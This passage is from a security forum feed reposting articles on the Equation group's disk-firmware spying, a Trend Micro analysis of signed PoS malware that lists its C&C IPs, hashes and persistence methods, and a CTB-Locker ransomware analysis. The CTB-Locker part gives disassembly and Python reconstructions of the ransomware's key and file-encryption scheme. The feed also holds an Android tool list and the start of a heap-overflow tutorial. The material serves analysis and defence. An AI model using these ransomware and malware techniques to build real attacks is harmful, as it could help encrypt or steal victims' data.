Kaspersky's reconstructions of the spying programs show that they could work in disk drives sold by more than a dozen companies, comprising essentially the entire market. They include Western Digital Corp, Seagate Technology Plc, Toshiba Corp, IBM, Micron Technology Inc and Samsung Electronics Co Ltd. Western Digital, Seagate and Micron said they had no knowledge of these spying programs. Toshiba and Samsung declined to comment. IBM did not respond to requests for comment. GETTING THE SOURCE CODE Raiu said the authors of the spying programs must have had access to the proprietary source code that directs the actions of the hard drives. That code can serve as a roadmap to vulnerabilities, allowing those who study it to launch attacks much more easily. "There is zero chance that someone could rewrite the [hard drive] operating system using public information," Raiu said. Concerns about access to source code flared after a series of high-profile cyberattacks on Google Inc and other U.S. companies in 2009 that were blamed on China. Investigators have said they found evidence that the hackers gained access to source code from several big U.S. tech and defense companies. It is not clear how the NSA may have obtained the hard drives' source code. Western Digital spokesman Steve Shattuck said the company "has not provided its source code to government agencies." The other hard drive makers would not say if they had shared their source code with the NSA. Seagate spokesman Clive Over said it has "secure measures to prevent tampering or reverse engineering of its firmware and other technologies." Micron spokesman Daniel Francisco said the company took the security of its products seriously and "we are not aware of any instances of foreign code." According to former intelligence operatives, the NSA has multiple ways of obtaining source code from tech companies, including asking directly and posing as a software developer. 
If a company wants to sell products to the Pentagon or another sensitive U.S. agency, the government can request a security audit to make sure the source code is safe. "They don't admit it, but they do say, 'We're going to do an evaluation, we need the source code,'" said Vincent Liu, a partner at security consulting firm Bishop Fox and former NSA analyst. "It's usually the NSA doing the evaluation, and it's a pretty small leap to say they're going to keep that source code." Kaspersky called the authors of the spying program "the Equation group," named after their embrace of complex encryption formulas. The group used a variety of means to spread other spying programs, such as by compromising jihadist websites, infecting USB sticks and CDs, and developing a self-spreading computer worm called Fanny, Kaspersky said. Fanny was like Stuxnet in that it exploited two of the same undisclosed software flaws, known as "zero days," which strongly suggested collaboration by the authors, Raiu said. He added that it was "quite possible" that the Equation group used Fanny to scout out targets for Stuxnet in Iran and spread the virus. (Reporting by Joseph Menn; Editing by Tiffany Wu) Sursa: Russian researchers expose breakthrough U.S. spying program | Reuters
  12. DbgKit February 15, 2015 | Permalink DbgKit is the first GUI extension for Debugging Tools for Windows. It will show you a hierarchical view of processes and detailed information about each process, including its full image path, command line, start time, memory statistics, vads, handles, threads, security attributes, modules, environment variables and more. WARNING: Using debugger extensions in a local kernel-mode debugging session or with tools like LiveKd that simulate local kernel debugging can cause the extensions to hang or to display inaccurate data. Download Sursa: Andrey Bazhan · DbgKit
  13. Signed PoS Malware Used In Pre-Holiday Attacks, Linked to Targeted Attacks 1:04 pm (UTC-7) | by Jay Yaneza (Threats Analyst) Last year, we detected some new PoS malware just before the holiday season. At that time, we omitted mentioning one fact – that the file was digitally signed with a valid certificate. Our research shows that these attacks involving PoS malware are growing in sophistication, with code signing and improved encryption becoming more commonplace. We were also able to connect this PoS malware to the group involved with the Anunak malware—which is related to the Carbanak gang as posted by our colleagues over at Fox-IT. Figure 1. Sample with valid digital signature (taken on November 27, 2014) Malware code signing has increased in recent years and malware authors often seek keys that allow file signing to make malicious files appear as legitimate software. In this case, the attackers went through the whole process of requesting a digital certificate to sign the binary from a known certificate authority. COMODO, the issuer of this certificate, has since revoked the signing certificate. With this in mind, we began searching for additional components of this binary. This blog entry adds context to our original blog post published last year. Carefully crafted binaries Based on other PoS malware that we have observed, we knew that this should be a multicomponent malware. As such, over the next couple of months after this incident, we monitored this threat – one file that caught our interest had the SHA1 hash d8e79a7d21a138bc02ec99cfb9dc59e2e0cedf09. We noted some important things about this particular file: First, the file itself was signed similarly: it used the same name, email and certificate authority. Secondly, the file construction was just too careful for the standard malware that we see on a daily basis. 
Analysis of the file showed that it has its own encryption method that cannot be identified by common tools, and that it only decrypts the necessary code, which is destroyed after being used. Another interesting thing is that the GetProcAddress API was used (which is almost abandoned nowadays). It uses a brute-force way to search the PE header table and calls NT* functions. During installation, the .text section is reused by the unpack code and installation, as seen below: Figure 2. Section reuse It then starts the host process svchost.exe with the parameters -k netsvc, with a suspended status. Once done, it proceeds to prepare a decrypted PE image file which can be written into memory. If everything is ready, it calls the NT* function to write the PE image into the host's process memory, set the thread context and resume the thread. Finally, the PE image in memory is destroyed immediately. Figure 3. CreateProcess with suspended creation state Figure 4. Decrypted PE image file in memory While the PE image loaded in memory can be dumped to file, the strings and API calls are still protected and it's not straightforward to decipher them. A decoder table was necessary to understand the inner workings of the file, as shown below: Figure 5. Decoder table Using homemade decryption tools, the following functionality was discovered:
- Two fixed C&C servers: 83.166.234.250 (ports 80 and 443), and 83.166.234.237 (port 443)
- Searching for the NSB Retail System Logs at C:\NSB\Coalition\Logs and nsb.pos.client.log
- Searching for files with the following extensions: bml cgi gif htm html jpg php png pst shtml txt
- The use of VNC and Remote Desktop
- Modifying the settings of the Windows firewall to give itself network access
- Database connectivity
- Reference to mimikatz – a tool to recover clear text passwords from LSASS
- Encryption and decryption routines
- Keylogging functionality
Targeting the Top PoS Vendor: Epicor This was not your run-of-the-mill malware. 
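The extension hunt described above can be expressed as a simple matcher. The function below is an illustrative Python reconstruction, not the malware's actual code; the extension list is the one reported in the analysis.

```python
import os

# File extensions the sample reportedly hunts for (list from the analysis above).
TARGET_EXTS = {".bml", ".cgi", ".gif", ".htm", ".html", ".jpg",
               ".php", ".png", ".pst", ".shtml", ".txt"}

def find_targets(filenames):
    """Return the names whose extension is on the target list (case-insensitive)."""
    return [name for name in filenames
            if os.path.splitext(name)[1].lower() in TARGET_EXTS]

hits = find_targets(["report.TXT", "nsb.pos.client.log", "index.php", "app.exe"])
```

A real scraper would walk the whole disk (e.g. with os.walk) rather than filter a list, but the matching logic is the same.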
It was a point-of-sale (PoS) malware that explicitly targeted the Epicor/NSB PoS system. Epicor was recently recognized as the top vendor of PoS software and leader in number of accounts and revenue over other top PoS vendors. A second look at the binary indicates that this particular file is related to the CARBERP banking family of Trojans, whose source code was leaked around 2013. In particular, this file had the following CARBERP plugins:
- plug and vnc.plug – VNC Plugin
- plug – iFOBS remote banking system
- plug – Ammy Remote Desktop Plugin
We went back and cross-referenced other files to look for other complex malware samples that could be linked to this particular sample. We came across another one (SHA1 hash: a0527db046665ee43205f963dd40c455219beddd) which shared almost the same complexity. Some of its significant characteristics are listed below: It drops a file called ms*.exe and creates a startup item under the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run key. Figure 6. Created registry entry Aside from this, it changes the Zone.Identifier alternate data stream to avoid the pop-up warning: Figure 7. Alternate data stream It attempts to acquire elevated privileges via SeRestorePrivilege, SeBackUpPrivilege, and SeDebugPrivilege. Privileges like these allow the caller full access to a process, including the ability to call TerminateProcess(), CreateRemoteThread(), and other potentially dangerous API calls on the target process. It also has anti-debugging functions, and has its own dynamic unpacking code:
- Unpack code into .text and jump back
- Allocate a block of memory at 0x7FF90000 (almost reaching the user-mode limit)
- Unpack code into 0x7FF90000 and jump there
- C&C server communication
Using feedback provided by our Smart Protection Network, we looked for other threats that were similar to these two samples. 
A quick evolution We saw a file that was similar to the above files, located in C:\Windows\SysWOW64 (for Windows 64-bit) and C:\Windows\System32 (for Windows 32-bit). The difference, however, was that this one was a DLL file (SHA1 hash: CCAD1C5037CE2A7A39F4B571FC10BE213249E611). Careful analysis revealed that, although compiled as a DLL file, it uses the same cipher as the earlier samples. However, here a different C&C server was used (5.61.38.52:443). This change may have been an attempt to evade analysis, as some automated analysis tools do not process DLLs since they cannot be directly executed. Figure 8. Decoder table These indicators show that these files were the work of a fairly sophisticated group of attackers. Who's responsible for this? As it turns out, we can attribute this to the European APT group that uses Anunak malware, which was previously reported by Group-IB and Fox-IT. Our research leads us to believe that the files listed below could be used in similar campaigns within the United States and Canada: Table 1. List of hashes and detection names (click to enlarge) Table 2. List of hashes and C&C servers (click to enlarge) It should be noted that two of the files listed here (5fa2a0639897a42932272d0f0be2ab456d99a402 and CCAD1C5037CE2A7A39F4B571FC10BE213249E611) have fake compile-time dates, a visible attempt to mask the files' validity. According to the certificate revocation list, the certificates used to sign these malicious files were revoked on August 05, 2014. Figure 9. Certificate Revocation List However, the files were still being signed with the certificates beyond that date. Here is the list of the files with digital certificates, and their signing time: Table 3. Time and date of malware signing Summary Trend Micro already detects all files listed above, where applicable. We would also like to recommend these steps in order to catch these kinds of attacks earlier: Audit accounts for failed/irregular logins. 
As seen by one of the tools used in this campaign, a password/credential dumper was used. If a user account is suddenly seen accessing a resource that looks unusual, this may be a sign. Audit network logs for abnormal connections. A network scanner was also used in this campaign, which can be used to enumerate a host's resources. A passive network scanner, which observes anomalies in network traffic, can be used to flag these events and is often a built-in functionality of a breach detection system. Study warnings from security solutions. If you see a combination of hacking tools, backdoors and Trojans on a particular host, it is worth determining whether these detections are of immediate concern – or not. In today's world, where a huge amount of malware is seen on a daily basis, it is important to note which malware could severely affect your business. For a full list of things to check, you can refer to 7 Places to Check for Signs of a Targeted Attack in Your Network. To learn more about PoS RAM scraper malware, you can refer to our previous research paper titled PoS RAM Scraper Malware: Past, Present and Future. Additional information and analysis by Abraham Camba, Jane Hsieh, and Kenney Lu. Sursa: http://blog.trendmicro.com/trendlabs-security-intelligence/signed-pos-malware-used-in-pre-holiday-attacks-linked-to-targeted-attacks/
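One concrete check that follows from this campaign: comparing a binary's signing time against the certificate's revocation date (the article notes files were still being signed after the August 05, 2014 revocation). A minimal sketch with illustrative timestamps:

```python
from datetime import datetime

# The signing certificate was revoked on this date (per the article);
# the sample timestamps below are illustrative, not the actual samples' times.
REVOKED_AT = datetime(2014, 8, 5)

def signature_suspicious(signing_time):
    """A signature applied on or after revocation should never be trusted."""
    return signing_time >= REVOKED_AT

assert signature_suspicious(datetime(2014, 11, 27))    # signed post-revocation
assert not signature_suspicious(datetime(2014, 6, 1))  # signed while still valid
```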
  14. CTB-Locker encryption/decryption scheme in details After my last post about CTB-Locker I received a lot of e-mails from people asking for a complete analysis of the malware. Most of them wanted to know if it's possible to restore the compromised files without paying the ransom. The answer is simple: it's impossible without knowing the Master key! That key resides on the malicious server and it's the only way to restore every single compromised file. There are some articles on the net about CTB-Locker's modus operandi. Everyone knows that ZLib and AES are used, but only a few mention the use of SHA256+Curve. To explain everything in detail I'll show you how encryption/decryption is done, step by step. Preamble: HIDDENINFO The HiddenInfo file is the core of the malware; it's full of precious data. There's no need to explain every field of the file; a closer look at the first part of it will suffice, because it plays an important part in the encryption/decryption scheme.

DCE1C1 call ds:CryptGenRandom
DCE1C7 lea eax, [ebp+systemTimeAsFileTime]
DCE1CA push eax
DCE1CB call ds:GetSystemTimeAsFileTime
DCE1D1 call ds:GetTickCount
DCE1D7 mov [ebp+gettickcountVal], eax
DCE1DA call ds:GetCurrentThreadId
DCE1E0 mov esi, eax
DCE1E2 rol esi, 10h ; Shift ThreadID
DCE1E5 call ds:GetCurrentProcessId
DCE1EB xor eax, esi ; ThreadID and ProcessID values inside the same dword
DCE1ED mov [ebp+threadID_processID], eax
DCE1F0 mov esi, 0EB7910h
DCE1F5 lea edi, [ebp+machineGuid]
DCE1F8 movsd ; Move MachineGUID
DCE1F9 movsd
DCE1FA movsd
DCE1FB lea eax, [ebp+random] ; Random sequence of bytes
DCE1FE push 34h ; Number of bytes to hash
DCE200 push eax ; Sequence of bytes to hash
DCE201 mov ecx, ebx ; Output buffer
DCE203 movsd
DCE204 call SHA256 ; SHA256(random)
DCE209 mov al, [ebx+1Fh]
DCE20C and byte ptr [ebx], 0F8h
DCE20F push 0E98718h ; Basepoint
DCE214 and al, 3Fh
DCE216 push ebx ; SHA256(random)
DCE217 push [ebp+outputBuffer] ; Public key
DCE21A or al, 40h
DCE21C mov [ebx+1Fh], al
DCE21F call curve_25519

The snippet is part of a procedure I called GenSecretAndPublicKeys. The secret key is obtained by applying SHA256 to a random sequence of 0x34 bytes composed of:

0x14 bytes: from CryptGenRandom function
0x08 bytes: from GetSystemTimeAsFileTime
0x04 bytes: from GetTickCount
0x04 bytes: from (ThreadID ^ ProcessID)
0x10 bytes: MachineGuid

Curve25519 is used to generate the corresponding public key. You can recognize the algorithm from the Basepoint vector, because it's a 0x09 byte followed by a series of 0x00 bytes (for a quick overview of the elliptic-curve algorithm used by the malware, take a look here: Curve25519: high-speed elliptic-curve cryptography). GenSecretAndPublicKeys is called twice, so two private and two public keys are created. I name them ASecret, APublic, BSecret and BPublic.

DCF1E7 mov [esp+274h+public], offset MasterPublic ; MPublic key
DCF1EE push eax ; BSecret
DCF1EF lea eax, [ebp+Shared_1] ; Shared_1
DCF1F5 push eax
DCF1F6 call curve_25519
DCF1FB add esp, 0Ch
DCF1FE lea eax, [ebp+Shared_1]
DCF204 push 20h
DCF206 push eax
DCF207 lea ecx, [ebp+aesKey] ; Hash is saved here
DCF20A call SHA256

SHA256(curve_25519(Shared_1, BSecret, MPublic)) — here the shared-secret computation takes place. MPublic is the Master public key and it's visible inside the memory address space of the malware. The Master secret key remains on the malicious server. Locating the Master public key is pretty easy because it sits between the information section (a sequence of info in various languages) and the ".onion" address. 
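The seed construction and key clamping from the GenSecretAndPublicKeys listing can be sketched in Python. All inputs are caller-supplied stand-ins for the Win32 values named in the disassembly (CryptGenRandom, GetSystemTimeAsFileTime, GetTickCount, thread/process IDs, MachineGuid):

```python
import hashlib
import os
import struct

def make_secret_key(random14, filetime, tickcount, tid, pid, machine_guid):
    """Reassemble the 0x34-byte seed hashed at DCE204 and apply the
    Curve25519 clamping seen at DCE20C/DCE214/DCE21A."""
    seed = random14                                   # 0x14 bytes, CryptGenRandom
    seed += struct.pack("<Q", filetime)               # 0x08 bytes, GetSystemTimeAsFileTime
    seed += struct.pack("<I", tickcount)              # 0x04 bytes, GetTickCount
    rol16 = ((tid << 16) | (tid >> 16)) & 0xFFFFFFFF  # rol esi, 10h
    seed += struct.pack("<I", rol16 ^ pid)            # 0x04 bytes, ThreadID ^ ProcessID
    seed += machine_guid                              # 0x10 bytes, MachineGuid
    assert len(seed) == 0x34
    sk = bytearray(hashlib.sha256(seed).digest())
    sk[0] &= 0xF8                                     # and byte ptr [ebx], 0F8h
    sk[31] = (sk[31] & 0x3F) | 0x40                   # and al, 3Fh / or al, 40h
    return bytes(sk)

secret = make_secret_key(os.urandom(0x14), 130675716000000000,
                         123456, 0x1A2B, 0x3C4D, os.urandom(0x10))
```

The clamping of byte 0 and byte 31 is the standard Curve25519 scalar preparation, which is how the listing can be identified as Curve25519 even without the Basepoint hint.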
The shared secret is then fed into the SHA256 hash algorithm, and the result is used as the key for AES encryption:

DCF20F lea eax, [ebp+aesExpandedKey]
DCF215 push eax
DCF216 mov edx, 100h
DCF21B lea ecx, [ebp+aesKey]
DCF21E call AEXExpandKey
DCF223 add esp, 0Ch
DCF226 xor edi, edi
DCF228 lea ecx, [ebp+aesExpandedKey]
DCF22E lea eax, [edi+0EF71ACh]
DCF234 push ecx
DCF235 push eax
DCF236 push eax
DCF237 call AES_ENCRYPT ; AES encryption

The malware encrypts a block of bytes (named SecretInfo) composed of:

SecretInfo:
ASecret ; a secret key generated by GenSecretAndPublicKeys
MachineGuid ; used to identify the infected machine
Various information (fixed value, checksum val among others)

Not so hard, but it's better to outline everything:
ASecret = SHA256(0x34_random_bytes)
Curve_25519(APublic, ASecret, BasePoint)
BSecret = SHA256(0x34_random_bytes)
Curve_25519(BPublic, BSecret, BasePoint)
Curve_25519(Shared_1, BSecret, MPublic)
AES_KEY_1 = SHA256(Shared_1)
Encrypted_SecretInfo = AES_ENCRYPT(SecretInfo, AES_KEY_1)
Part of this information is saved inside the HiddenInfo file, right at the beginning of it:

HiddenInfo:
+0x00 offset: APublic
+0x24 offset: BPublic
+0x44 offset: Encrypted_SecretInfo

So, the two public keys are visible, but the private key ASecret is encrypted. It's impossible to get the real ASecret value without the AES key… Ok, now that you know how the HiddenInfo file is created, I can start with the file encryption scheme. 
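The HiddenInfo layout above can be expressed as a small parser. A sketch under the assumption that each public-key field is 0x24 bytes wide, of which only the first 0x20 bytes are the Curve25519 key (the remaining 4 bytes per field are not documented in the post):

```python
def parse_hidden_info(blob):
    """Split the start of HiddenInfo per the offsets above."""
    a_public = blob[0x00:0x20]            # APublic (32-byte Curve25519 key)
    b_public = blob[0x24:0x44]            # BPublic (32-byte Curve25519 key)
    encrypted_secret_info = blob[0x44:]   # AES-encrypted SecretInfo
    return a_public, b_public, encrypted_secret_info

# Demo buffer: 0x44 header bytes followed by a 90-byte Encrypted_SecretInfo.
demo = bytes(range(0x44)) + bytes(90)
a_pub, b_pub, enc_info = parse_hidden_info(demo)
```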
CTB-Locker file encryption

C74834 lea eax, [ebp+50h+var_124] ; Hash will be saved here
C7483A push eax
C7483B lea eax, [ebp+50h+var_E4]
C74841 push 30h
C74843 lea edi, [ebp+50h+var_D4]
C74849 push eax ; 0x30 random bytes
C7484A rep movsd
C7484C call SHA256Hash
...
C7486E push eax ; BasePoint
C7486F lea eax, [ebp+50h+var_124]
C74875 push eax ; CSecret: SHA256(0x30_random_bytes)
C74876 lea eax, [ebp+50h+var_B4]
C74879 push eax ; CPublic
C7487A call curve25519 ; Generate a public key
C7487F push offset dword_C943B8 ; DPublic: first 32 bytes of HiddenInfo
C74884 lea eax, [ebp+50h+var_124]
C7488A push eax ; CSecret
C7488B lea eax, [ebp+50h+var_164]
C74891 push eax ; Shared_2
C74892 call curve25519 ; Generate shared secret
C74897 lea eax, [ebp+50h+var_144]
C7489D push eax
C7489E lea eax, [ebp+50h+var_164]
C748A4 push 20h
C748A6 push eax ; Shared_2
C748A7 call SHA256Hash ; SHA256(Shared_2)
...
C74955 push 34h
C74957 push [ebp+50h+var_18] ; Compression level: 3
C7495A lea eax, [ebp+50h+PointerToFileToEncrypt]
C7495D push eax ; Original file bytes to compress
C7495E call ZLibCompress
...
C74B1F push [ebp+50h+var_4]
C74B22 lea ecx, [ebp+50h+expandedKey] ; SHA256(Share_2) is used as key
C74B28 push [ebp+50h+var_4]
C74B2B call AES_Encrypt ; It encrypts 16 bytes per round starting from the first 16 bytes of the ZLib compressed file
C74B30 add [ebp+50h+var_4], 10h ; Increase the pointer to the bytes to encrypt
C74B34 dec ebx
C74B35 jnz short loc_C74B1F ; Jump up and encrypt the next 16 bytes

It's quite easy indeed; it uses the same functions (SHA256, Curve, AES). To understand what's going on you only have to follow the code. 
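The ZLibCompress → AES_Encrypt loop above processes the compressed stream 16 bytes at a time. A Python sketch of the compress-then-carve stage (the zero-padding of the final partial block is my assumption; the post does not state the padding scheme):

```python
import zlib

def prepare_blocks(original, level=3):
    """Compress first (zlib level 3, as the listing shows), then carve the
    stream into 16-byte AES blocks, mirroring the encryption loop above."""
    compressed = zlib.compress(original, level)
    if len(compressed) % 16:
        compressed += b"\x00" * (16 - len(compressed) % 16)  # assumed padding
    return [compressed[i:i + 16] for i in range(0, len(compressed), 16)]

blocks = prepare_blocks(b"sample document contents " * 40)
# decompressobj tolerates the trailing pad bytes (they land in unused_data).
restored = zlib.decompressobj().decompress(b"".join(blocks))
```

Compressing before encrypting matters: ciphertext is incompressible, so the order also explains why the payload shrinks despite encryption.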
The operations sequence is:
CSecret = SHA256(0x30_random_bytes)
Curve_25519(CPublic, CSecret, BasePoint)
Curve_25519(Shared_2, CSecret, APublic)
AES_KEY_2 = SHA256(Shared_2)
ZLibFile = ZLibCompress(OriginalFile)
Encrypted_File = AES_Encrypt(ZLibFile, AES_KEY_2)
DPublic inside the disassembled code is indeed APublic (the first 32 bytes of HiddenInfo). That's how CTB-Locker encrypts the bytes of the original file. These bytes are saved into the new compromised file together with some more data. A typical compromised file has the following structure:

+0x00 offset: CPublic
+0x20 offset: AES_Encrypt(InfoVector, AES_KEY_2)
+0x30 offset: AES_Encrypt(ZLibFile, AES_KEY_2)

InfoVector is a sequence of 16 bytes with the first four equal to "CTB1"; this tag word is used to check the correctness of the key provided by the server during the decryption routine. The decryption demonstration feature, implemented by the malware to prove that it can restore files, uses AES_KEY_2 directly. If you remember, the key was saved inside HiddenInfo; there are a total of five saved keys. In this case, if you have CSecret you can easily follow the process described above (remember that APublic comes from the first 32 bytes of HiddenInfo), but without CSecret it's impossible to restore the original files. It's important to note that in the encryption process CTB-Locker doesn't need an open Internet connection. It doesn't send keys/data to the server, it simply encrypts everything! An Internet connection is needed in the decryption part only. CTB-Locker file decryption At some point, before the real decryption process, there's a data exchange between the infected machine and the malicious server. The malware sends a block of bytes (taken from HiddenInfo) to the server and the server replies, sending back the unique decryption key. 
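The compromised-file layout and the "CTB1" tag check can be sketched as follows; the demo buffer is synthetic:

```python
def split_compromised_file(data):
    """Carve a compromised file per the layout above."""
    c_public = data[0x00:0x20]     # CPublic, fresh per file
    enc_info = data[0x20:0x30]     # AES_Encrypt(InfoVector, AES_KEY_2)
    enc_payload = data[0x30:]      # AES_Encrypt(ZLibFile, AES_KEY_2)
    return c_public, enc_info, enc_payload

def key_is_correct(decrypted_info_vector):
    """The 'CTB1' tag at the start of the decrypted InfoVector reveals
    whether the supplied AES key was right; a wrong key yields garbage."""
    return decrypted_info_vector[:4] == b"CTB1"

c_public, info_block, payload = split_compromised_file(
    bytes(0x20) + b"IVIVIVIVIVIVIVIV" + b"P" * 32)
```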
The block is composed of the BPublic key, SecretInfo and some minor things:

DataToServer:
32 bytes: BPublic
90 bytes: SecretInfo
16 bytes: general info

The malware uses the key to restore the files. Do you remember the decryption part from my last post? Well, the real decryption scheme is not so different. There's one more step, the calculation of the AES key. To do that, the unique key sent by the server is used to decrypt every file:
curve_25519(Shared, Unique_Key, first_0x20_bytes_from_compromised_file)
AES_DECRYPTION_KEY = SHA256(Shared)
ZLibFile = AES_Decrypt(Encrypted_File, AES_DECRYPTION_KEY)
OriginalFile = ZLibDecompress(ZLibFile)
The unique key is sent just once, so the decryption method needs only one key to decrypt all the compromised files. How is that possible? My explanation From the HiddenInfo part I have:
Curve_25519(APublic, ASecret, BasePoint)
Curve_25519(BPublic, BSecret, BasePoint)
Curve_25519(Shared_1, BSecret, MPublic)
AES_KEY_1 = SHA256(Shared_1)
Encrypted_SecretInfo = AES_ENCRYPT(SecretInfo, AES_KEY_1)
The server receives DataToServer and applies the elliptic-curve (Diffie–Hellman) principle:
Curve_25519(Shared_1, MSecret, BPublic)
Shared_1 computed on the server is equal to Shared_1 calculated in the HiddenInfo creation part. Now, with Shared_1, it AES-decrypts SecretInfo, obtaining the ASecret key. ASecret is the key used to decrypt all the compromised files. 
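Packing DataToServer per the field sizes above is straightforward; a sketch with placeholder bytes:

```python
def build_data_to_server(b_public, encrypted_secret_info, general_info):
    """Concatenate the fields sent to the C&C, using the sizes listed above."""
    assert len(b_public) == 32
    assert len(encrypted_secret_info) == 90
    assert len(general_info) == 16
    return b_public + encrypted_secret_info + general_info

message = build_data_to_server(bytes(32), bytes(90), bytes(16))
```

Note that nothing in this 138-byte message is usable without MSecret: BPublic alone cannot recover Shared_1, which is exactly why the exchange is safe for the attacker.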
From the encryption part:
Curve_25519(CPublic, CSecret, BasePoint)
Curve_25519(Shared_2, CSecret, APublic)
AES_KEY_2 = SHA256(Shared_2)
ZLibFile = ZLibCompress(OriginalFile)
Encrypted_File = AES_Encrypt(ZLibFile, AES_KEY_2)
That said, here is how ASecret is used in the decryption process (applying the same EC principle):
Curve_25519(Shared_2, ASecret, CPublic)
AES_KEY_2 = SHA256(Shared_2)
ZLibFile = AES_Decrypt(Encrypted_File, AES_KEY_2)
OriginalFile = ZLibDecompress(ZLibFile)
So, ASecret is the Unique_Key computed by the server, and it's used to decrypt every file. That means one thing only: without MSecret you can't restore your original files… Final thoughts There's not much to say really. CTB-Locker is dangerous and it will keep damaging systems as long as people keep double-clicking attachments – sad but true. Feel free to contact me for comments, criticisms, suggestions, etc.! Sursa: https://zairon.wordpress.com/2015/02/17/ctb-locker-encryptiondecryption-scheme-in-details/
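The reason a single server-computed key unlocks every file is the commutativity of Diffie–Hellman key exchange: Shared_2 derived from (CSecret, APublic) equals Shared_2 derived from (ASecret, CPublic). A toy sketch using classic multiplicative-group DH in place of Curve25519 (same commutativity property; the modulus below happens to be the Curve25519 field prime):

```python
import hashlib
import secrets

# Toy Diffie-Hellman standing in for Curve25519 scalar multiplication.
P = 2**255 - 19
G = 2

def keypair():
    sk = secrets.randbelow(P - 2) + 1
    return sk, pow(G, sk, P)

a_secret, a_public = keypair()  # ASecret/APublic (APublic sits in HiddenInfo)
c_secret, c_public = keypair()  # CSecret/CPublic (CPublic heads each file)

# Malware, at encryption time:  Shared_2 from (CSecret, APublic)
shared_at_encrypt = pow(a_public, c_secret, P)
# Decryptor, with the server-supplied ASecret:  Shared_2 from (ASecret, CPublic)
shared_at_decrypt = pow(c_public, a_secret, P)

# Same shared secret, hence the same AES_KEY_2 on both sides.
key_enc = hashlib.sha256(shared_at_encrypt.to_bytes(32, "little")).digest()
key_dec = hashlib.sha256(shared_at_decrypt.to_bytes(32, "little")).digest()
```

Because g^(ac) = (g^a)^c = (g^c)^a mod p, releasing ASecret once lets the victim rebuild every per-file Shared_2 without the server ever seeing the CSecret values, which were discarded after each file was encrypted.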
  15. Android Malware Analysis Tools [TABLE=width: 900] [TR] [TD=class: news-txt, width: 900, align: left] TOOLS » AFLogical - Android forensics tool developed by viaForensics » AndroChef - Java Decompiler apk, dex, jar and java class-files » Androguard - Reverse engineering, Malware and goodware analysis of Android applications » Android Loadable Kernel Modules » Android SDK » Android4me - J2ME port of Google's Android » Android-apktool - A tool for reverse engineering Android apk files » Android-forensics - Open source Android Forensics app and framework » Android-random - Collection of extended examples for Android developers » APK Studio - Android Reverse Engineering Tool By Vaibhav Pandey a.k.a VPZ » ApkAnalyser - Static, virtual analysis tool » Apk-extractor - Android Application (.apk) file extractor and Parser for Android Binary XML » Apkinspector - Powerful GUI tool for analysts to analyze the Android applications » Apk-recovery - Recover main resources from your .apk file » ART - GUI for all your decompiling and recompiling needs » Audit tools » Canhazaxs - A tool for enumerating the access to entries in the file system of an Android device » Dava - Decompiler for arbitrary Java bytecode » DDMS - Dalvik Debug Monitor Server » Decaf-platform - DECAF Binary Analysis Platform » DecoJer - Java Decompiler » Dedexer - Disassembler tool for DEX files. 
» Device Monitor - Graphical user interface for several Android application debugging and analysis tools
» Dex2jar - Tools to work with android .dex and java .class files
» Dex-decomplier - Dex decompiler
» Dexinfo - A very rudimentary Android DEX file parser
» Dexter - Static android application analysis tool
» Dexterity - Dex manipulation library
» Dextools - Miscellaneous DEX (Dalvik Executable) tools
» Drozer - Comprehensive security audit and attack framework for Android
» Heimdall - Cross-platform open-source tool suite used to flash firmware (aka ROMs) onto Samsung mobile devices
» Hidex - Demo application where a method named thisishidden() in class MrHyde is hidden from disassemblers but not called by the app
» Hooker - Automated Dynamic Analysis of Android Applications
» JAD - Java Decompiler
» JADX - Dex to Java decompiler
» JD-GUI - Standalone graphical utility that displays Java source code of “.class” files
» JEB Decompiler - The Interactive Android Decompiler
» Luyten - Java Decompiler Gui for Procyon
» Radare - The reverse engineering framework
» Redexer - A Dalvik bytecode instrumentation framework
» Reverse Android - Reverse-engineering tools for Android applications
» Scalpel - A surgical debugging tool to uncover the layers under your app
» Smali - An assembler/disassembler for Android's dex format
» Soot - Java Optimization Framework
» STAMP - STatic Analysis of Mobile Programs
» Systrace - Analyze performance by capturing and displaying execution times of your applications and other Android system processes
» TaintDroid - Tracking how apps use sensitive information required
» Traceview - Graphical viewer for execution logs saved by your application
» Undx - Bytecode translator
» Xenotix-APK-Decompiler - APK decompiler powered by dex2jar and JAD
» XML-apk-parser - Print AndroidManifest.xml directly from apk file
» ZjDroid - Android app dynamic reverse tool based on Xposed framework

UNPACKERS
» Android Unpacker - Android Unpacker presented at
Defcon 22 - Android Hacker Protection Level 0
» Dehoser - Unpacker for the HoseDex2Jar APK Protection which packs the original file inside the dex header
» Kisskiss - Unpacker for various Android packers/protectors

PACKERS / OBFUSCATORS
» Allatori
» APKfuscator - A generic DEX file obfuscator and munger
» APKProtect
» Bangcle
» DexGuard - Optimizer and obfuscator for Android
» HoseDex2Jar - Adds some instructions to the classes.dex file that Dex2Jar cannot process
» ProGuard - Shrinks, optimizes, and obfuscates the code by removing unused code and renaming classes, fields, and methods with semantically obscure names

TOOLKITS
» Android Malware Analysis Toolkit
» APK Resource Toolkit
» MobiSec
» Open Source Android Forensics Toolkit
» Santoku

SANDBOXES
» Android Sandbox
» Anubis
» APK Analyzer
» AVCaesar
» Droidbox
» HackApp
» Mobile Sandbox
» SandDroid
» VisualThreat
[/TD]
[/TR]
[/TABLE]

Source: http://www.nyxbone.com/malware/android_tools.html
16. w00w00 on Heap Overflows

Subject: w00w00 on Heap Overflows

This is a PRELIMINARY BETA VERSION of our final article! We apologize for any mistakes. We still need to add a few more things.

[ Note: You may also get this article off of ]
[ http://www.w00w00.org/articles.html. ]

w00w00 on Heap Overflows
By: Matt Conover (a.k.a. Shok) & w00w00 Security Team

------------------------------------------------------------------------------
Copyright (C) January 1999, Matt Conover & w00w00 Security Development

You may freely redistribute or republish this article, provided the following conditions are met:

1. This article is left intact (no changes made, the full article published, etc.)

2. Proper credit is given to its authors; Matt Conover (Shok) and the w00w00 Security Development (WSD).

You are free to rewrite your own articles based on this material (assuming the above conditions are met). It'd also be appreciated if an e-mail is sent to either mattc@repsec.com or shok@dataforce.net to let us know you are going to be republishing this article or writing an article based upon one of our ideas.
------------------------------------------------------------------------------

Prelude: Heap/BSS-based overflows are fairly common in applications today; yet, they are rarely reported. Therefore, we felt it was appropriate to present a "heap overflow" tutorial. The biggest critics of this article will probably be those who argue heap overflows have been around for a while. Of course they have, but that doesn't negate the need for such material.

In this article, we will refer to "overflows involving the stack" as "stack-based overflows" ("stack overflow" is misleading) and "overflows involving the heap" as "heap-based overflows". This article should provide the following: a better understanding of heap-based overflows along with several methods of exploitation, demonstrations, and some possible solutions/fixes.
Prerequisites to this article: a general understanding of computer architecture, assembly, C, and stack overflows.

